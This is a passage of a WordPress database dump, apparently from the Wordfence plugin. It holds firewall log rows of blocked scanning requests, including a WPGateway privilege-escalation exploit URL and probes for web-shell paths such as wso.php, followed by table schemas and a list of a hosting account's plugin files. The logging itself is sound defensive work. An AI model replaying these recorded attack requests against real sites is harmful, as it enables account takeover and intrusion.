(51576, 1712338353.579915, 1712338353.262200, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/blog/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51638, 1712367541.478854, 1712367541.047600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/106.0.0.0', 'blocked:waf', 'WPGateway <= 3.5 - Unauthenticated Privilege Escalation', '{"learningMode":0,"failedRules":"510","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGdhdGV3YXkvd3BnYXRld2F5LXdlYnNlcnZpY2UtbmV3LnBocA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGdhdGV3YXkvd3BnYXRld2F5LXdlYnNlcnZpY2UtbmV3LnBocA==","category":"privesc","ssl":1}'),
(51577, 1712338351.621243, 1712338351.311100, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/test/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51665, 1712367976.259162, 1712367975.981900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/viral-optins/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/90.0.4427.0 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy92aXJhbC1vcHRpbnMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy92aXJhbC1vcHRpbnMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51578, 1712338349.496938, 1712338349.218400, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wordpress/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50436, 1711358404.417697, 1711358403.907300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(50437, 1711358385.498027, 1711358385.171900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(50438, 1711358367.838649, 1711358367.387900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50432, 1711358451.385377, 1711358451.055600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50433, 1711358437.084675, 1711358436.775300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(50442, 1711358307.313374, 1711358307.044600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50439, 1711358354.140006, 1711358353.855300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(50440, 1711358337.581126, 1711358337.218300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(50441, 1711358324.805524, 1711358324.460600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/cloud.php/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocC93c28ucGhw","category":"brute-force","ssl":1}'),
(50434, 1711358425.041879, 1711358424.717300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50435, 1711358415.776590, 1711358415.467800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfhoover`
--

CREATE TABLE `wpou_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfissues`
--

CREATE TABLE `wpou_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfknownfilelist`
--

CREATE TABLE `wpou_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  `wordpress_path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfknownfilelist`
--

INSERT INTO `wpou_wfknownfilelist` VALUES
(1, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/.htaccess', 'wp-content/plugins/akismet/.htaccess'),
(2, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/LICENSE.txt', 'wp-content/plugins/akismet/LICENSE.txt'),
(3, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet-admin.css', 'wp-content/plugins/akismet/_inc/akismet-admin.css'),
(4, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet-admin.js', 'wp-content/plugins/akismet/_inc/akismet-admin.js'),
(5, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet-frontend.js', 'wp-content/plugins/akismet/_inc/akismet-frontend.js'),
(6, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet.css', 'wp-content/plugins/akismet/_inc/akismet.css'),
(7, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet.js', 'wp-content/plugins/akismet/_inc/akismet.js'),
(8, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/fonts/inter.css', 'wp-content/plugins/akismet/_inc/fonts/inter.css'),
(9, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg', 'wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg'),
(10, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png', 'wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png'),
(11, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/arrow-left.svg', 'wp-content/plugins/akismet/_inc/img/arrow-left.svg'),
(12, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/icon-external.svg', 'wp-content/plugins/akismet/_inc/img/icon-external.svg'),
(13, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/logo-a-2x.png', 'wp-content/plugins/akismet/_inc/img/logo-a-2x.png'),
(14, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/logo-full-2x.png', 'wp-content/plugins/akismet/_inc/img/logo-full-2x.png'),
(15, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css', 'wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css'),
(16, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css', 'wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css'),
(17, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/akismet.php', 'wp-content/plugins/akismet/akismet.php'),
(18, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/changelog.txt', 'wp-content/plugins/akismet/changelog.txt'),
(19, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-admin.php', 'wp-content/plugins/akismet/class.akismet-admin.php'),
(20, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-cli.php', 'wp-content/plugins/akismet/class.akismet-cli.php'),
(21, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-rest-api.php', 'wp-content/plugins/akismet/class.akismet-rest-api.php'),
(22, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-widget.php', 'wp-content/plugins/akismet/class.akismet-widget.php'),
(23, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet.php', 'wp-content/plugins/akismet/class.akismet.php'),
(24, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/index.php', 'wp-content/plugins/akismet/index.php'),
(25, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/readme.txt', 'wp-content/plugins/akismet/readme.txt'),
(26, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/activate.php', 'wp-content/plugins/akismet/views/activate.php'),
(27, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/config.php', 'wp-content/plugins/akismet/views/config.php'),
(28, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/connect-jp.php', 'wp-content/plugins/akismet/views/connect-jp.php'),
(29, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/enter.php', 'wp-content/plugins/akismet/views/enter.php'),
(30, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/get.php', 'wp-content/plugins/akismet/views/get.php'),
(31, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/logo.php', 'wp-content/plugins/akismet/views/logo.php'),
(32, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/notice.php', 'wp-content/plugins/akismet/views/notice.php'),
(33, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/predefined.php', 'wp-content/plugins/akismet/views/predefined.php'),
(34, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/setup.php', 'wp-content/plugins/akismet/views/setup.php'),
(35, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/start.php', 'wp-content/plugins/akismet/views/start.php'),
(36, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/stats.php', 'wp-content/plugins/akismet/views/stats.php'),
(37, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/title.php', 'wp-content/plugins/akismet/views/title.php'),
(38, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/wrapper.php', 'wp-content/plugins/akismet/wrapper.php'),
(39, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/astra-hooks.php', 'wp-content/plugins/astra-hooks/astra-hooks.php'),
(40, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks-loader.php', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks-loader.php'),
(41, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks-markup.php', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks-markup.php'),
(42, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks-white-label.php', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks-white-label.php'),
(43, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks.php', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks.php'),
(44, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/customizer-panels-and-sections.php', 'wp-content/plugins/astra-hooks/classes/customizer-panels-and-sections.php'),
(45, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/index.php', 'wp-content/plugins/astra-hooks/classes/index.php'),
(46, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/sections/index.php', 'wp-content/plugins/astra-hooks/classes/sections/index.php'),
(47, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/sections/section-hooks.php', 'wp-content/plugins/astra-hooks/classes/sections/section-hooks.php'),
(48, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/includes/white-label.php', 'wp-content/plugins/astra-hooks/includes/white-label.php'),
(49, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/languages/astra-hooks.pot', 'wp-content/plugins/astra-hooks/languages/astra-hooks.pot'),
(50, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/readme.txt', 'wp-content/plugins/astra-hooks/readme.txt'),
(51, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/index.php', 'wp-content/plugins/index.php'),
(52, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/backuply-black.png', 'wp-content/plugins/loginizer/assets/images/backuply-black.png'),
(53, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/backuply-square.png', 'wp-content/plugins/loginizer/assets/images/backuply-square.png'),
(54, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/facebook.png', 'wp-content/plugins/loginizer/assets/images/facebook.png'),
(55, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/index.php', 'wp-content/plugins/loginizer/assets/images/index.php'),
(56, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/loginizer-200.png', 'wp-content/plugins/loginizer/assets/images/loginizer-200.png'),
(57, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/pagelayer_product.png', 'wp-content/plugins/loginizer/assets/images/pagelayer_product.png'),
(58, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/twitter.png', 'wp-content/plugins/loginizer/assets/images/twitter.png'),
(59, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/wpcentral_product.png', 'wp-content/plugins/loginizer/assets/images/wpcentral_product.png'),
(60, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/js/chart.js', 'wp-content/plugins/loginizer/assets/js/chart.js'),
(61, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/js/jquery-paginate.js', 'wp-content/plugins/loginizer/assets/js/jquery-paginate.js'),
(62, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/functions.php', 'wp-content/plugins/loginizer/functions.php'),
(63, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/index.php', 'wp-content/plugins/loginizer/index.php'),
(64, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/init.php', 'wp-content/plugins/loginizer/init.php'),
(65, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/lib/IPv6/BigInteger.php', 'wp-content/plugins/loginizer/lib/IPv6/BigInteger.php'),
(66, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/lib/IPv6/IPv6.php', 'wp-content/plugins/loginizer/lib/IPv6/IPv6.php'),
(67, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/license.txt', 'wp-content/plugins/loginizer/license.txt'),
(68, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/loginizer.php', 'wp-content/plugins/loginizer/loginizer.php'),
(69, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/admin.php', 'wp-content/plugins/loginizer/main/admin.php'),
(70, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/ajax.php', 'wp-content/plugins/loginizer/main/ajax.php'),
(71, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/2fa.php', 'wp-content/plugins/loginizer/main/settings/2fa.php'),
(72, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/brute-force.php', 'wp-content/plugins/loginizer/main/settings/brute-force.php'),
(73, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/checksum.php', 'wp-content/plugins/loginizer/main/settings/checksum.php'),
(74, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/dashboard.php', 'wp-content/plugins/loginizer/main/settings/dashboard.php'),
(75, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/passwordless.php', 'wp-content/plugins/loginizer/main/settings/passwordless.php'),
(76, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/recaptcha.php', 'wp-content/plugins/loginizer/main/settings/recaptcha.php'),
(77, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/security.php', 'wp-content/plugins/loginizer/main/settings/security.php'),
(78, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/sso.php', 'wp-content/plugins/loginizer/main/settings/sso.php'),
(79, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/readme.txt', 'wp-content/plugins/loginizer/readme.txt'),
(80, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/autoload.php', 'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),
(81, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php', 'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),
(82, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php', 'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php'),
(83, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE', 'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),
(84, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),
(85, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),
